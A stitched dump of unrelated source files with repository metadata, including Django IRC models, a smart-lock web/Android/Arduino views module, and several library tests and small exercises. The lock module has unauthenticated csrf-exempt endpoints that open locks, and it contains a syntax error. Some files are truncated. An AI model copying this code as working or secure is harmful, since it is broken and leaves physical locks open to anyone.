data = {'plot': (self.plot_name, file)}
response = self.session.put(url, files=data, headers=headers).json()
else:
data = {'plot': (self.plot_name, plot)} # type: ignore[dict-item]
response = self.session.put(url, files=data, headers=headers).json()
return response
| [
"noreply@github.com"
] | noreply@github.com |
4dc3fde953d2515b5815da6192706d0acef9283d | cfc1c61117ee215ddcc92667e55e3aacf7dd93e1 | /tests/test_meta_caching.py | 51809e9a5e56050ad7957e6a254f657b0a875393 | [
"Apache-2.0"
] | permissive | REPlegacy/rep | a036f9717e0a460cc492152517aca9d234f509f9 | 0742d8002c48453d4a5a031677c55d75b86c1f76 | refs/heads/master | 2021-06-28T17:10:57.220950 | 2020-09-22T11:53:13 | 2020-09-22T11:53:13 | 157,720,892 | 3 | 0 | NOASSERTION | 2018-11-19T18:17:40 | 2018-11-15T14:03:52 | Jupyter Notebook | UTF-8 | Python | false | false | 3,703 | py | from __future__ import division, print_function, absolute_import
import time
import os.path
import datetime
from sklearn.linear_model import LogisticRegression, LinearRegression, SGDClassifier, SGDRegressor
from rep.metaml._cache import CacheHelper
from rep.metaml.cache import CacheClassifier, CacheRegressor, cache_helper
from rep.test.test_estimators import generate_classification_data, check_classifier, check_regression
__author__ = 'Alex Rogozhnikov'
def test_cache_helper():
cache = CacheHelper(folder='./.cache/rep', expiration_in_seconds=1000)
cache.store_in_cache('first', 'hash', 24)
cache.store_in_cache('first', 'hash', 42)
cache.store_in_cache('second', 'hash', 45)
assert cache.get_from_cache('first', 'hash') == (True, 42)
assert cache.get_from_cache('first', 'wrong_hash')[0] == False
cache.clear_cache()
assert cache.get_from_cache('first', 'hash')[0] == False
assert cache.get_from_cache('first', 'wrong_hash')[0] == False
cache.clear_cache()
def test_cache_expiration(folder='./.cache/rep'):
cache = CacheHelper(folder=folder, expiration_in_seconds=1000)
cache.store_in_cache('first', 'hash', 42)
assert cache.get_from_cache('first', 'hash') == (True, 42)
for file_name in os.listdir(cache.folder):
new_time = datetime.datetime.now() - datetime.timedelta(seconds=10)
new_time = time.mktime(new_time.timetuple())
file_path = os.path.join(cache.folder, file_name)
os.utime(file_path, (new_time, new_time))
# should be able to find
assert cache.get_from_cache('first', 'hash') == (True, 42)
for file_name in os.listdir(cache.folder):
new_time = datetime.datetime.now() - datetime.timedelta(seconds=2000)
new_time = time.mktime(new_time.timetuple())
file_path = os.path.join(cache.folder, file_name)
os.utime(file_path, (new_time, new_time))
# should not be able to find
assert cache.get_from_cache('first', 'hash')[0] == False
cache.clear_cache()
def test_cache_classifier():
cache_helper.clear_cache()
for Wrapper, Model in [(CacheClassifier, LogisticRegression), (CacheRegressor, LinearRegression)]:
X, y, weights = generate_classification_data(n_classes=2)
clf = Wrapper('first', Model()).fit(X, y)
assert clf._used_cache == False
clf = Wrapper('first', Model()).fit(X + 0, y + 0)
assert clf._used_cache == True
# changed name
clf = Wrapper('second', Model()).fit(X, y)
assert clf._used_cache == False
# changed data
X_new = X.copy()
X_new.iloc[0, 0] += 1
clf = Wrapper('first', Model()).fit(X_new, y)
assert clf._used_cache == False
# changed labels
y_new = y.copy()
y_new[0] += 1
clf = Wrapper('first', Model()).fit(X, y_new)
assert clf._used_cache == False
# added weights
clf = Wrapper('first', Model()).fit(X, y, sample_weight=None)
assert clf._used_cache == False
# changed parameters
clf = Wrapper('first', Model(n_jobs=2)).fit(X, y)
assert clf._used_cache == False
# fitting previous once again. Checking that overwriting is correct.
clf = Wrapper('first', Model(n_jobs=2)).fit(X, y)
assert clf._used_cache == True
cache_helper.clear_cache()
def test_models():
for _ in range(3):
clf = CacheClassifier('clf', SGDClassifier(loss='log'))
check_classifier(clf, has_staged_pp=False, has_importances=False)
reg = CacheRegressor('reg', SGDRegressor())
check_regression(reg, has_staged_predictions=False, has_importances=False)
cache_helper.clear_cache()
| [
"iamfullofspam@gmail.com"
] | iamfullofspam@gmail.com |
b6678a25668c221feec3628a553e9100c77d1646 | 66209a75a7b7416f9f58d41f084bc319c5810f9f | /laconcha/seed.py | 3dc6be1e1fc3abf11324208f1812a9eceff9970c | [] | no_license | ZippeyKeys12/laconcha | 18debf3e5c36280039fba6c9ef31e9b5fa418a0f | 5ec0ad9d534070ba583c3852bb0d73cf4c3ecd67 | refs/heads/master | 2022-12-05T02:57:34.235745 | 2020-08-21T03:09:04 | 2020-08-21T03:09:04 | 275,266,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | import string
from random import choices
def get_seed():
return ''.join(choices(string.hexdigits, k=32))
class Seed:
pass
| [
"ZippeyKeys12@gmail.com"
] | ZippeyKeys12@gmail.com |
d4eb63a3ce6955ce6d7e7f559285f4098819a4e2 | 79f541042e4b4d6bb443e7a758ca918817ea0f33 | /Python/23_python.py | f87439711aa00ebf5beeb05135c88dd6cc5d9f1b | [] | no_license | ashutoshm1771/Source-Code-from-Tutorials | d5f950db8f5f648e87303835e9558eeba404939a | f5552d4bd0f4bebcf5c674ff730fcb61f2d7a1ce | refs/heads/master | 2020-09-15T06:08:31.777622 | 2019-11-22T09:08:31 | 2019-11-22T09:08:31 | 223,364,275 | 4 | 0 | null | 2019-11-22T09:01:51 | 2019-11-22T09:01:48 | null | UTF-8 | Python | false | false | 185 | py | fw = open('sample.txt', 'w')
fw.write('Writing some stuff in my text file\n')
fw.write('I like bacon\n')
fw.close()
fr = open('sample.txt', 'r')
text = fr.read()
print(text)
fr.close() | [
"amaanmarfatia@gmail.com"
] | amaanmarfatia@gmail.com |
be022fe3fefde1e08b0c0cafbf8646767f2ba51d | a65103e2f33192d9e6fcf8c8852f263369190175 | /core/models.py | c653f88b69de6db591ec935f5bf162047d706249 | [] | no_license | dhilipsiva/ircman | e23153572d5f8cf09d4ed7d47c47b90050762489 | 767b42f321598b155f2fd74729947ed92f8da160 | refs/heads/master | 2023-07-10T06:42:45.855788 | 2015-07-22T04:17:00 | 2015-07-22T04:17:00 | 35,310,806 | 6 | 0 | null | 2023-09-05T05:15:21 | 2015-05-09T01:58:04 | Python | UTF-8 | Python | false | false | 7,308 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# vim: fenc=utf-8
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
#
"""
File name: models.py
Version: 0.1
Author: dhilipsiva <dhilipsiva@gmail.com>
Date created: 2015-05-09
"""
__author__ = "dhilipsiva"
__status__ = "development"
"""
"""
# Python imports
import datetime
from uuid import uuid4
# Django imports
from django.utils.timezone import utc
from django.contrib.auth.models import AbstractUser
from django.db.models import Model, ForeignKey, DateTimeField, UUIDField, \
CharField, TextField, PositiveIntegerField, BooleanField
def utc_now():
"""
`now` with UTC
"""
return datetime.datetime.utcnow().replace(tzinfo=utc)
class User(AbstractUser):
"""
A custom user so that we can add permissions easily
"""
id = UUIDField(primary_key=True, default=uuid4, editable=False)
socket = UUIDField(default=uuid4, editable=False)
class Meta(AbstractUser.Meta):
abstract = False
def save(self, *args, **kwargs):
if 'pbkdf2_sha256' not in self.password:
self.set_password(self.password)
super(User, self).save(*args, **kwargs)
def to_dict(self, with_sensitive_data=False):
"""
Dictify user
"""
d = {
'id': str(self.id),
'username': self.username,
'firstName': self.first_name,
'lastName': self.last_name,
}
if with_sensitive_data:
d.update({
'socket': str(self.socket),
'email': self.email,
})
return d
def __str__(self):
return self.username
def __repr__(self):
return "<User: %s>" % self.__str__()
class Server(Model):
id = UUIDField(primary_key=True, default=uuid4, editable=False)
host = CharField(max_length=256)
port = PositiveIntegerField(default=6667, blank=True)
is_ssl = BooleanField(default=False)
is_sasl = BooleanField(default=False)
def to_dict(self):
"""
Dictify user
"""
return {
'id': str(self.id),
'host': self.host,
'port': self.port,
'isSsl': self.is_ssl,
'isSasl': self.is_sasl,
}
def __str__(self):
return self.host
def __repr__(self):
return "<Server: %s>" % self.__str__()
class UserServer(Model):
id = UUIDField(primary_key=True, default=uuid4, editable=False)
user = ForeignKey(User, related_name="user_servers")
server = ForeignKey(Server, related_name="user_servers")
label = CharField(max_length=256, default="My IRC Server")
username = CharField(max_length=256)
password = CharField(max_length=256, null=True, blank=True)
nickname = CharField(max_length=256)
realname = CharField(max_length=256, null=True, blank=True)
def to_dict(self):
"""
Dictify user
"""
return {
'id': str(self.id),
'user': str(self.user_id),
'server': str(self.server_id),
'label': self.label,
'username': self.username,
'password': self.password,
'nickname': self.nickname,
'realname': self.realname,
}
def __str__(self):
return "%s - %s" % (self.user, self.server)
def __repr__(self):
return "<UserServer: %s>" % self.__str__()
class Channel(Model):
id = UUIDField(primary_key=True, default=uuid4, editable=False)
server = ForeignKey(Server, related_name="channels")
name = CharField(max_length=256)
def to_dict(self):
"""
Dictify user
"""
return {
'id': str(self.id),
'server': str(self.server_id),
'name': self.name,
}
def __str__(self):
return "%s - %s" % (self.server, self.name)
def __repr__(self):
return "<Channel: %s>" % self.__str__()
class UserChannel(Model):
id = UUIDField(primary_key=True, default=uuid4, editable=False)
user_server = ForeignKey(
UserServer, related_name="user_channels", null=True)
channel = ForeignKey(Channel, related_name="user_channels")
nickname = CharField(max_length=256)
password = CharField(max_length=256, null=True, blank=True)
mode = CharField(max_length=16, null=True, blank=True)
def to_dict(self):
"""
Dictify user
"""
return {
"id": str(self.id),
"userServer": str(self.user_server_id),
"channel": str(self.channel_id),
"nickname": self.nickname,
"password": self.password,
"mode": self.mode,
}
def to_dict_deep(self):
"""
Deep `to_dict`
"""
d = self.to_dict()
d['userServer'] = self.user_server.to_dict()
d['channel'] = self.channel.to_dict()
return d
def __str__(self):
return "%s - %s" % (self.channel, self.nickname)
def __repr__(self):
return "<UserChannel: %s>" % self.__str__()
class BaseMessage(Model):
id = UUIDField(primary_key=True, default=uuid4, editable=False)
text = TextField()
created_on = DateTimeField(auto_now_add=True)
def to_dict(self):
"""
Dictify user
"""
return {
'id': str(self.id),
'text': self.text,
'createdOn': self.created_on,
}
class Meta:
abstract = True
class Message(BaseMessage):
channel = ForeignKey(Channel, related_name="messages")
user_channel = ForeignKey(UserChannel, related_name="messages")
def to_dict(self):
"""
Dictify user
"""
d = super(Message, self).to_dict()
d.update({
'channel': str(self.channel_id),
'userChannel': str(self.user_channel_id),
})
return d
def __str__(self):
return "%s" % self.text
def __repr__(self):
return "<Message: %s>" % self.__str__()
class Conversation(Model):
id = UUIDField(primary_key=True, default=uuid4, editable=False)
user_channel_1 = ForeignKey(UserChannel, related_name='+')
user_channel_2 = ForeignKey(UserChannel, related_name='+')
def to_dict(self):
"""
Dictify Conversation
"""
return {
'id': str(self.id),
'userChannel1': str(self.user_channel_1_id),
'userChannel2': str(self.user_channel_2_id),
}
def __str__(self):
return "%s - %s" % (self.user_channel_1_id, self.user_channel_2_id)
def __repr__(self):
return "<Conversation: %s>" % self.__str__()
class PrivateMessage(BaseMessage):
conversation = ForeignKey(Conversation, related_name='private_messages')
user_channel = ForeignKey(UserChannel, related_name='private_messages')
read = BooleanField(default=False)
def to_dict(self):
"""
Dictify user
"""
d = super(PrivateMessage, self).to_dict()
d.update({
'conversation': str(self.conversation_id),
'userChannel': str(self.user_channel_id),
'read': self.read,
})
return d
def __repr__(self):
return "<PrivateMessage: %s>" % self.__str__()
| [
"dhilipsiva@gmail.com"
] | dhilipsiva@gmail.com |
cce44f1ce3d2f6c45026ee3cdcd05c3497af1f7c | 6acf3492182e31cf837c281e3fa96826f7f8782a | /portal/.~c9_invoke_7yV7Ix.py | bb4ace26e21ccdd625ae313510f73e6630086714 | [] | no_license | andreibratu/lockeebackend | 3ce3970f63dd541275c8650b2804d4f72c568521 | 3df3619738876eddc84fc749b8d6a50aecea1624 | refs/heads/working | 2020-05-21T20:45:54.276674 | 2016-11-24T16:34:31 | 2016-11-24T16:34:31 | 65,299,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,669 | py | from django.core.urlresolvers import reverse
from django.views.decorators.csrf import csrf_exempt
from django.views.generic.list import ListView
from random import choice
from string import ascii_uppercase
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.views.generic import View
from forms import ShareIDOpen, UserReg, UserLogin, AddLock, VerifyAndroid, AndroidOpenLock, AndroidGetLocks, AndroidLogin, AndroidRegister, AndroidAddLock, AndroidGenerateCode
from django.contrib.auth.mixins import LoginRequiredMixin
from portal.models import Owner, LockAbsVal, Lock
from django.shortcuts import render_to_response
from django.template import RequestContext
import json
# SERVER SIDE ####
def handler404(request):
response = render_to_response('portal/404.html', {},
context_instance=RequestContext(request))
response.status_code = 404
return response
def handler500(request):
response = render_to_response('portal/500.html', {},
context_instance=RequestContext(request))
response.status_code = 500
return response
def web_welcome(request):
"""This view displays the welcome page."""
if request.user.is_authenticated():
return redirect('portal:home')
return render(request, 'portal/welcome.html', {})
def web_register(request):
"""This view handles the register requests on the web client."""
form_class = UserReg
register_form = form_class(request.POST)
if request.method == 'POST':
if register_form.is_valid():
new_user = User()
username = register_form.cleaned_data['usermail']
password = register_form.cleaned_data['password']
name = register_form.cleaned_data['name']
try:
duplicate_check = User.objects.get(username = username)
return render(request,
'portal/welcome.html', {'error': 'Username already registered'})
except User.DoesNotExist:
new_user.username = username
new_user.set_password(password)
new_user.first_name = name
new_user.save()
new_owner = Owner(owner = new_user)
new_owner.save()
user = authenticate(username=username, password=password)
login(request, user)
return redirect('portal:home')
else:
return render(request, 'portal/welcome.html', {'error': 'Invalid register form'})
else:
return render(request, 'portal/forbidden.html', {})
def web_login(request):
"""This view handles the login request on the web client."""
form_class = UserLogin
login_form = form_class(request.POST)
if request.method == 'POST':
if login_form.is_valid():
username = login_form.cleaned_data['usermail']
password = login_form.cleaned_data['password']
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('portal:home')
else:
return render(request, 'portal/welcome.html', {'error': 'Inactive user'})
else:
return render(request, 'portal/welcome.html', {'error': 'Invalid credentials'})
else:
return render(request, 'portal/welcome.html', {'error': 'Invalid login form'})
else:
return render(request, 'portal/forbidden.html', {})
@login_required(login_url='portal:welcome')
def web_display_locks(request, message=''):
what_owner = Owner.objects.get(owner=request.user)
locks_of_logged_in_user = what_owner.locks.all()
return render(request, 'portal/home.html', {'object_list': locks_of_logged_in_user, 'error': message})
@login_required(login_url='portal:welcome')
def web_add_lock(request):
"""This function submits the form for DB processing."""
form_class = AddLock
form = form_class(request.POST)
if request.method == 'POST':
if form.is_valid():
error=''
lock_inner_id = form.cleaned_data['lockcode']
nickname = form.cleaned_data['lockname']
orientation = form.cleaned_data['orientation']
owner = Owner.objects.get(owner=request.user)
try:
abs_lock = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
try:
lock_already_added = owner.locks.get(abs_lock=abs_lock)
error = 'You have already added this lock'
except Lock.DoesNotExist:
try:
nickname_already_used = owner.locks.get(nickname=nickname)
error = 'You have already used this nickname'
except Lock.DoesNotExist:
abs_lock.orientation = orientation
abs_lock.save()
new_lock = Lock(abs_lock=abs_lock, nickname=nickname)
new_lock.save()
owner.locks.add(new_lock)
owner.save()
return web_display_locks(request, message='Lock added sucessfully')
except LockAbsVal.DoesNotExist:
error = 'The Lock Does Not Exist'
return web_display_locks(request, error)
else:
return HttpResponse('bad form')
else:
return render(request, 'portal/forbidden.html', {})
@login_required(login_url='portal:login')
def web_logout(request):
"""This view logs the user out."""
logout(request)
return render(request, 'portal/welcome.html', {})
@login_required(login_url='portal:login')
def web_generate_code(request, lock_nickname):
"""This view generates a new share code at user's demand."""
logged_in_owner = Owner.objects.get(owner=request.user)
lock_to_change = logged_in_owner.locks.get(nickname=lock_nickname)
lock_to_change.share_id = ''
for i in range(0, 11):
lock_to_change.share_id += choice(ascii_uppercase)
lock_to_change.save()
logged_in_owner.save()
message = "Here's the new share code for %s" % lock_nickname
return web_display_locks(request, message)
@login_required(login_url='portal:login')
def web_profile(request):
"""This view handles the user's profile on the web site."""
return render(request, 'portal/profile.html', {'name': request.user.first_name})
def web_about(request):
"""This view presents the details of this project's godlike developers."""
return render(request, 'portal/about.html', {})
@login_required(login_url='portal:login')
def web_portal_mechanic(request, lock_inner_id, lock_nickname):
"""This view opens/closes a lock via the website."""
what_lock = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
if what_lock.is_opened:
what_lock.is_opened = False
message = "%s is now closed" % lock_nickname
what_lock.save()
return web_display_locks(request, message)
else:
what_lock.is_opened = True
message = "%s is now opened" % lock_nickname
what_lock.save()
return web_display_locks(request, message)
return HttpResponse('something bad happened')
@login_required(login_url='portal:login')
def web_delete_lock(request, nickname):
"""This view deletes a relative_lock from the owner's list."""
owner = Owner.objects.get(owner=request.user)
owner.locks.get(nickname=nickname).delete()
message = "%s has been removed from the list" % nickname
return web_display_locks(request, message)
# ANDROID SIDE ###
@csrf_exempt
def android_login(request):
"""This view handles the login requests that come from the android terminal."""
if request.method == 'POST':
form = AndroidLogin(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = authenticate(username=username, password=password)
if user is not None:
return HttpResponse('login success')
else:
return HttpResponse('fail')
else:
return HttpResponse('Form Error')
else:
return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_register(request):
"""This view handles the register requests that come from the an android terminal."""
if request.method == 'POST':
form = AndroidRegister(request.POST)
if form.is_valid():
new_user = User()
username = form.cleaned_data['username']
password = form.cleaned_data['password']
full_name = form.cleaned_data['name']
new_user.username = username
new_user.set_password(password)
new_user.first_name = full_name
new_user.save()
create_owner = Owner(owner=new_user)
create_owner.save()
return HttpResponse('register success')
else:
return HttpResponse('form fail')
else:
return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_verify(request):
"""This view helps the android terminal check username availability in real time."""
if request.method == 'POST':
form = VerifyAndroid(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
try:
User.objects.get(username=username)
return HttpResponse('email already taken')
except User.DoesNotExist:
return HttpResponse('verify success')
else:
return HttpResponse('wow')
else:
return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_mechanic(request):
"""This view opens/closes a lock via an android terminal."""
if request.method == 'POST':
form = AndroidOpenLock(request.POST)
if form.is_valid():
lock_inner_id = form.cleaned_data['lock_inner_id']
try:
what_lock = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
if what_lock.is_opened:
what_lock.is_opened = False
response = 'locked'
else:
what_lock.is_opened = True
response = 'unlocked'
what_lock.save()
return HttpResponse(response)
except LockAbsVal.DoesNotExist:
return HttpResponse(lock_inner_id)
else:
return HttpResponse('bad form')
else:
return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_locks_query(request):
"""This view sends to the android terminal the locks the user has access to."""
if request.method == 'POST':
form = AndroidGetLocks(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
try:
logged_user = User.objects.get(username=username)
logged_owner = Owner.objects.get(owner=logged_user)
try:
user_locks = logged_owner.locks.all()
lock_info = {'locks_info': [{'nickname': lock.nickname, 'lock_inner_id': lock.abs_lock.lock_inner_id, 'share_id': lock.share_id, 'status': lock.abs_lock.is_opened} for lock in user_locks]}
json_response = json.dumps(lock_info)
return HttpResponse(json_response)
except Lock.DoesNotExist:
return HttpResponse('0')
except User.DoesNotExist:
return HttpResponse('unknown user')
else:
return HttpResponse('form error')
else:
return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_ping(request):
"""This lets the Android client ping the server to try server connection."""
if request.method == 'GET':
return HttpResponse('received')
else:
return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_add_lock(request):
"""Allows the android terminal to add a lock into the DB."""
if request.method == "POST":
form = AndroidAddLock(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
lock_inner_id = form.cleaned_data['lock_inner_id']
nickname = form.cleaned_data['nickname']
orientation = form.cleaned_data['orientation']
the_user = User.objects.get(username=username)
try:
lock_validity = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
try:
owner = Owner.objects.get(owner=the_user)
try:
duplicate_nickname_check = owner.locks.get(nickname=nickname)
return HttpResponse('nickname already used')
except Lock.DoesNotExist:
abs_lock = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
try:
abs_lock_already_added_check = owner.locks.get(abs_lock=abs_lock)
return HttpResponse('this lock was already registered')
except Lock.DoesNotExist:
abs_lock.orientation = orientation
abs_lock.save()
new_lock = Lock(abs_lock=abs_lock, nickname=nickname)
new_lock.save()
owner.locks.add(new_lock)
owner.save()
return HttpResponse('lock registered')
except User.DoesNotExist:
return HttpResponse('user does not exist')
except LockAbsVal.DoesNotExist:
return HttpResponse('lock does not exist')
else:
return HttpResponse('invalid form')
else:
return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_generate_code(request):
"""This view generates a new share code at user's demand on android terminal."""
if request.method == 'POST':
form = AndroidGenerateCode(request.POST)
if form.is_valid():
nickname = form.cleaned_data['nickname']
username = form.cleaned_data['username']
what_user = User.objects.get(username=username)
logged_in_owner = Owner.objects.get(owner=what_user)
lock_to_change = logged_in_owner.locks.get(nickname=nickname)
lock_to_change.share_id = ''
for i in range(0, 11):
lock_to_change.share_id += choice(ascii_uppercase)
lock_to_change.save()
logged_in_owner.save()
return HttpResponse(lock_to_change.share_id)
else:
return HttpResponse('bad form')
else:
return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_profile(request):
"""This view helps the android terminal to get the fullname of the user."""
if request.method == 'POST':
form = VerifyAndroid(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
full_name = User.first_name
try:
User.objects.get(username=username)
return HttpResponse(full_name)
except User.DoesNotExist:
return HttpResponse('user does not exist')
else:
return HttpResponse('wow')
else:
return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_remove(request):
"""Allows removal of locks from android terminal."""
if request.method == 'POST':
form = AndroidGenerateCode(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
nickname = form.cleaned_data['nickname']
try:
what_user = User.objects.get(username=username)
owner = Owner.objects.get(owner=what_user)
try:
owner.locks.get(nickname=nickname).delete()
return HttpResponse('success')
except Lock.DoesNotExist:
def android_open_sharecode(request)
except User.DoesNotExist:
return HttpResponse('user error')
else:
return HttpResponse('bad form')
else:
return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_open_sharecode(request):
"""Allows an android terminal to unlock the door by share_id."""
if request.method == 'POST':
form = ShareIDOpen(request.POST)
if form.is_valid():
shareID = form.cleaned_data['shareID']
try:
what_lock = Lock.objects.get(share_id=shareID)
if what_lock.abs_lock.is_opened:
what_lock.abs_lock.is_opened = False
what_lock.save()
return HttpResponse('closed')
else:
what_lock.abs_lock.is_opened = True
what_lock.save()
return HttpResponse('opened')
except Lock.DoesNotExist:
return HttpResponse('bad code')
else:
return render(request, 'portal/forbidden.html', {})
# ARDUINO SIDE
@csrf_exempt
def arduino_mechanic(request):
"""This view is pinged by the arduino clients to check for changes in db ( every 1 sec )"""
if request.method == 'POST':
lock_inner_id = request.body
try:
already_registered_lock = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
is_opened = already_registered_lock.is_opened
if is_opened:
return HttpResponse('#unlocked')
else:
return HttpResponse('#locked')
except LockAbsVal.DoesNotExist:
new_registration_lock = LockAbsVal(lock_inner_id=lock_inner_id)
new_registration_lock.save()
return HttpResponse('new lock registered')
else:
return render(request, 'portal/forbidden.html', {}) | [
"bratu.andrei@outlook.com"
] | bratu.andrei@outlook.com |
784226429847848c20d7ff49b864ec51605e29f3 | 35a4c50eb161a402e8f3bbc3fe2bd75f77d757cb | /src/zad1/hamming.py | e42b9438146cde66c5eeae03c44707bd57a954dd | [] | no_license | TestowanieAutomatyczneUG/laboratorium-5-Grzeskii | de6c85a4eb0ad95b6d7d84ce125f0186c7960ddf | a3379356a0560ebf1b7b9c5225d7006d7e3dd5d2 | refs/heads/master | 2023-01-04T22:53:30.719255 | 2020-11-03T19:16:58 | 2020-11-03T19:16:58 | 309,400,055 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 319 | py | class Hamming:
def distance(first, second):
numberOfErrors = 0
if len(first) != len(second):
raise ValueError("Strands should be the same length")
for i in range(len(first)):
if first[i] != second[i]:
numberOfErrors += 1
return numberOfErrors | [
"grzegorz.rzeski@autonomik.pl"
] | grzegorz.rzeski@autonomik.pl |
a26020ee941b2c90838334df8971da6794fecc60 | f4a586996c4e7ba508abcd17bb3279f25cb8a384 | /samples/__init__.py | 50420bdbb2ff11693fa54dd5f9a9663047cf3767 | [] | no_license | 750584261/api_test_frame | 7183b04d6aa9d64e2d73b1e12ff6fc9f50288d3d | 0ca8b04a08e9605a72da7a8f43454362585be9f9 | refs/heads/master | 2023-03-09T22:41:53.643478 | 2021-02-23T11:09:01 | 2021-02-23T11:09:01 | 341,520,202 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | """
-*- coding: utf-8 -*-
@datetime : 2021/2/23 19:08:24
@Author : wenbin
@File : __init__.py.py
"""
| [
"750584261@qq.com"
] | 750584261@qq.com |
86c9b86af42f911790b3c9a9171e90b2a3a6d5ab | 6b8c3974d3ce5f7841e51dcb406666c0c5d92155 | /heat/heat/tests/mistral/test_mistral_cron_trigger.py | f675a7962563de8a3c4633e373b00471eb251b3b | [
"Apache-2.0"
] | permissive | swjang/cloudexchange | bbbf78a2e7444c1070a55378092c17e8ecb27059 | c06ed54f38daeff23166fb0940b27df74c70fc3e | refs/heads/master | 2020-12-29T03:18:43.076887 | 2015-09-21T07:13:22 | 2015-09-21T07:13:22 | 42,845,532 | 1 | 1 | null | 2015-09-21T07:13:22 | 2015-09-21T05:19:35 | C++ | UTF-8 | Python | false | false | 4,428 | py | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from heat.common import template_format
from heat.engine import resources
from heat.engine.resources.openstack.mistral import cron_trigger
from heat.engine import scheduler
from heat.tests import common
from heat.tests import utils
stack_template = '''
heat_template_version: 2013-05-23
resources:
cron_trigger:
type: OS::Mistral::CronTrigger
properties:
name: my_cron_trigger
pattern: "* * 0 * *"
workflow: {'name': 'get_first_glance_image', 'input': {} }
count: 3
first_time: "2015-04-08 06:20"
'''
class FakeCronTrigger(object):
def __init__(self, name):
self.name = name
self.next_execution_time = '2015-03-01 00:00:00'
self.remaining_executions = 3
self._data = {'trigger': 'info'}
class MistralCronTriggerTestResource(cron_trigger.CronTrigger):
@classmethod
def is_service_available(cls, context):
return True
class MistralCronTriggerTest(common.HeatTestCase):
def setUp(self):
super(MistralCronTriggerTest, self).setUp()
resources.initialise()
utils.setup_dummy_db()
self.ctx = utils.dummy_context()
t = template_format.parse(stack_template)
self.stack = utils.parse_stack(t)
resource_defns = self.stack.t.resource_definitions(self.stack)
self.rsrc_defn = resource_defns['cron_trigger']
self.client = mock.Mock()
self.patchobject(MistralCronTriggerTestResource, 'client',
return_value=self.client)
def _create_resource(self, name, snippet, stack):
ct = MistralCronTriggerTestResource(name, snippet, stack)
self.client.cron_triggers.create.return_value = FakeCronTrigger(
'my_cron_trigger')
self.client.cron_triggers.get.return_value = FakeCronTrigger(
'my_cron_trigger')
scheduler.TaskRunner(ct.create)()
args = self.client.cron_triggers.create.call_args[1]
self.assertEqual('* * 0 * *', args['pattern'])
self.assertEqual('get_first_glance_image', args['workflow_name'])
self.assertEqual({}, args['workflow_input'])
self.assertEqual('2015-04-08 06:20', args['first_time'])
self.assertEqual(3, args['count'])
self.assertEqual('my_cron_trigger', ct.resource_id)
return ct
def test_create(self):
ct = self._create_resource('trigger', self.rsrc_defn, self.stack)
expected_state = (ct.CREATE, ct.COMPLETE)
self.assertEqual(expected_state, ct.state)
def test_resource_mapping(self):
mapping = cron_trigger.resource_mapping()
self.assertEqual(1, len(mapping))
self.assertEqual(cron_trigger.CronTrigger,
mapping['OS::Mistral::CronTrigger'])
def test_attributes(self):
ct = self._create_resource('trigger', self.rsrc_defn, self.stack)
self.assertEqual('2015-03-01 00:00:00',
ct.FnGetAtt('next_execution_time'))
self.assertEqual(3, ct.FnGetAtt('remaining_executions'))
self.assertEqual({'trigger': 'info'}, ct.FnGetAtt('show'))
def test_delete(self):
ct = self._create_resource('trigger', self.rsrc_defn, self.stack)
scheduler.TaskRunner(ct.delete)()
self.assertEqual((ct.DELETE, ct.COMPLETE), ct.state)
self.client.cron_triggers.delete.assert_called_once_with(
ct.resource_id)
def test_delete_not_found(self):
ct = self._create_resource('trigger', self.rsrc_defn, self.stack)
self.client.cron_triggers.delete.side_effect = (
self.client.mistral_base.APIException(error_code=404))
scheduler.TaskRunner(ct.delete)()
self.assertEqual((ct.DELETE, ct.COMPLETE), ct.state)
self.client.cron_triggers.delete.assert_called_once_with(
ct.resource_id)
| [
"kiku4@kinx.net"
] | kiku4@kinx.net |
87f90331cdb3d4c5fd43445499bf8c27fe2d3f42 | 4142e25e9f6ece5b6192af9b6f237d096ceab9da | /Python школа(2017-2020)/V.py | 9bd5ce9207d0b0d41f27ae85ac741d91383fad8c | [] | no_license | Sergtrf/Sergey-Trofimov | ad007ad175356ad9f2c5d9e555635301db6c4c9b | 660a5ae04ee915fb593728371c9e3bba80f45002 | refs/heads/master | 2023-04-08T23:54:31.983866 | 2021-04-23T06:41:30 | 2021-04-23T06:41:43 | 357,283,338 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | n = int(input())
a = n//10
b=b2 = n//5
c=c2 = n//2
d=d2 = n
summa = 0
while a != -1:
p = n-a*10
if p == 0:
summa += 1
a -= 1
else:
a -= 1
while b != -1:
